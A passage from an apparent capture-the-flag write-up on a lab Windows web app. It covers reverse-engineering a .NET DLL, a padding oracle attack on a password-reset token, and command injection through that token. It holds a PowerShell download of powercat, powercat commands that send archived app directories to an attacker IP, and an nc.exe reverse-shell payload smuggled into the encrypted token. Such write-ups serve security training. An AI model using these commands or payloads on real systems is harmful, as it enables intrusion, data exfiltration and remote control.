175|       |   GridView.js
176|       |   Menu.js
177|       |   MenuStandards.js
178|       |   SmartNav.js
179|       |   TreeView.js
180|       |   WebForms.js
181|       |   WebParts.js
182|       |   WebUIValidation.js
183|       |
184|       \---MSAjax
185|               MicrosoftAjax.js
186|               MicrosoftAjaxApplicationServices.js
187|               MicrosoftAjaxComponentModel.js
188|               MicrosoftAjaxCore.js
189|               MicrosoftAjaxGlobalization.js
190|               MicrosoftAjaxHistory.js
191|               MicrosoftAjaxNetwork.js
192|               MicrosoftAjaxSerialization.js
193|               MicrosoftAjaxTimer.js
194|               MicrosoftAjaxWebForms.js
195|               MicrosoftAjaxWebServices.js
196|
197\---static
198        logo.png
199        nprs.jpg

These two look promising, maybe it’s another .net deserialisation vulnerability. let’s download them to our machine first. same two DLL are in production version of the webapp.

maybe worth to download these as well and compare them… idk

1C:\WEBAPPS\PartImages_Staging\bin\perespective.dll
2C:\WEBAPPS\PartImages_Prod\bin\perespective.dll

upload powercat and then send files to our machine. I decided to archive the dirs and send them over just in case I need source code to be available offline.

1powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.12/powerc
2at.ps1', 'C:\Users\webuser\Documents\pc.ps1')
3
4#then import module
5powershell -c import-module .\pc.ps1

1#staging
2compress-archive -path C:\WEBAPPS\PartImages_Staging\ -DestinationPath archive.zip
3#copy to attacker
4powercat -c 10.10.14.12 -p 8888 -i archive.zip
5#prod
6compress-archive -path C:\WEBAPPS\PartImages_Prod\ -DestinationPath archive2.zip
7#copy to attacker
8powercat -c 10.10.14.12 -p 8888 -i archive2.zip -v

Let’s investigate files now..we can now open it in .NET debugger and see if there is anything interesting.

0x06 DLL reverse engi Link to heading

staging DLL Link to heading

heaps of stuff to look at… There decryption and encryption functions:

Search for “password” returned some results, including the validation function:

Since we got the admin via “forgot password” link, I tried to search for “forgot” keyword and this part came up, which appears to be quite interesting…

There is a redirection to the forgot.aspx page:

1{
2string variable = "PerspectiveSessionKey" + ConfigurationManager.AppSettings["environment"];
3string str = Utils.Encrypt(value, Environment.GetEnvironmentVariable(variable));
4base.Response.Redirect("/Account/forgot.aspx?token=" + str);
5}

Change password function:

Let’s check “forgot.aspx” source code next.

0x07 “forgot.aspx” source code examination Link to heading

Upon opening the aspx file, I found a js funciton changePasswordClient() that seems to be responsible for password change. source

 1<script type="text/javascript">
 2        function changePasswordClient() {
 3            var postString;
 4            postString = "password1=" + document.getElementById("MainContent_PassBox1").value;
 5            postString += "&password2=" + document.getElementById("MainContent_PassBox2").value;
 6            postString += "&token=" + document.getElementById("MainContent_TokenField").value;
 7
 8            var xmlHttp = new XMLHttpRequest();
 9            xmlHttp.onreadystatechange = function () {
10                if (xmlHttp.readyState == 4) {
11                    if (xmlHttp.status == 200) {
12                        document.getElementById("MainContent_ChangeErrors").textContent = xmlHttp.responseText;
13                    }
14                    else {
15                        document.getElementById("MainContent_ChangeErrors").textContent = "error";
16                    }
17                }
18            }
19            xmlHttp.open("post", "/handlers/changePassword.ashx");
20            xmlHttp.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
21            xmlHttp.send(postString);
22        }
23
24
25</script>

It appears there is another “interesting” file called “changePassword.ashx” in handlers dir.

might want to check it as well. apart from that, nothing interesting in the forgot.aspx one.

changePassword.ashx examination Link to heading

similar validate password funciton as in perspecive.dll

Also, there is another executable that launches upon password reset submission

maybe BOF?

The exe file accepts two variables: decryptedstring and password1. We can add our value to the later due to the following piece of code:

However, it is then passed onto validPassword function:

Which will detect any invalid chars and results in the error…

Well, that’s kinda sucks.. Let’s see how the password is decrypted, maybe there is something interesting.

0x08 pwd decryption function analysis Link to heading

 1// perspective.Utils
 2// Token: 0x06000011 RID: 17 RVA: 0x000024F0 File Offset: 0x000006F0
 3public static byte[] AES_Decrypt(byte[] bytesToBeDecrypted, byte[] ivBytes, byte[] passwordBytes)
 4{
 5	byte[] result = null;
 6	byte[] salt = new byte[]
 7	{
 8		1,
 9		2,
10		3,
11		4,
12		5,
13		6,
14		7,
15		8
16	};
17	using (MemoryStream memoryStream = new MemoryStream())
18	{
19		using (RijndaelManaged rijndaelManaged = new RijndaelManaged())
20		{
21			rijndaelManaged.KeySize = 256;
22			rijndaelManaged.BlockSize = 128;
23			Rfc2898DeriveBytes rfc2898DeriveBytes = new Rfc2898DeriveBytes(passwordBytes, salt, 1000);
24			rijndaelManaged.Key = rfc2898DeriveBytes.GetBytes(rijndaelManaged.KeySize / 8);
25			rijndaelManaged.IV = ivBytes;
26			rijndaelManaged.Mode = CipherMode.CBC;
27			using (CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateDecryptor(), CryptoStreamMode.Write))
28			{
29				cryptoStream.Write(bytesToBeDecrypted, 0, bytesToBeDecrypted.Length);
30				cryptoStream.Close();
31			}
32			result = memoryStream.ToArray();
33		}
34	}
35	return result;
36}

Ok, so, it uses CBC cipher but we don’t know either IV, nor the key. I guess, we have to google about ciphers now O_O

0x09 Oracle Padding attack? Link to heading

So, there is an article on MS website Timing vulnerabilities with CBC-mode symmetric decryption using padding.. CBC padding attack? Let’s google more :D Padding oracle attack - wiki Apparently, there is a wiki page, so there should be a POC 100%.

hacker tricks article

After multiple trial and error attempts with the above perl script, I came accross this nice GitHub repo: pyOracle2 The best part about the tool as it will redirect all the traffic iva proxy (as per config file) and we will be able to see all our requests in burp. The config file looks as following:

 1[default]
 2name = perspective
 3URL = http://localhost:8009/handlers/changePassword.ashx
 4httpMethod = POST
 5postFormat = form-urlencoded
 6inputMode = parameter
 7encodingMode = base64Url
 8vulnerableParameter = token
 9additionalParameters = {"password1":"testPassword1!", "password2":"testPassword1!"}
10blocksize = 16
11httpProxyOn = True
12httpProxyIp = 127.0.0.1
13httpProxyPort = 8080
14headers = {"User-Agent":"Mozilla/5.0","Content-Type":"text/html; charset=UTF-8"}
15cookies = {}
16ivMode = firstblock
17iv =  [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]
18oracleMode = negative
19oracleText = is invalid

We’ve uploaded the netcat to the ‘x’ folder on C drive and then executed the tool as the following:

1python3 pyOracle2/pyOracle2.py -m encrypt -c prsp.config -i "admin@perspective.htb & powershell C:\x\nc.exe -e cmd 10.10.14.12 4444"

didn’t work because of the following error:

the code shows the following:

1System.Diagnostics.ProcessStartInfo procStartInfo = new System.Diagnostics.ProcessStartInfo("cmd", "/c C:\\inetpub\\bin\\" +  ConfigurationManager.AppSettings["environment"]  + "\\PasswordReset.exe " + decryptedstring + " " + password1);

so we can comment out the part after “decryptedstring”:

1python3 pyOracle2/pyOracle2.py -m encrypt -c prsp.config -i "admin@perspective.htb & powershell C:\x\nc.exe -e cmd 10.10.14.12 4444 #"

The tool will run again (it takes ages for it to finish, maybe I should’ve used it locally given I have source code for the app, but I was too lazy):

1PeZAExpLlgHkJkr0ypNIIdQEuMucCDyJfISPtJFFcZzsheiWWejGGyd4SpT4WHlN3Zn6hZS99JTa2nRBI2ps6K9J6-J-p8gs5s5CZfIwHd4AAAAAAAAAAAAAAAAAAAAA

And we got the admin shell

…. and the root.txt: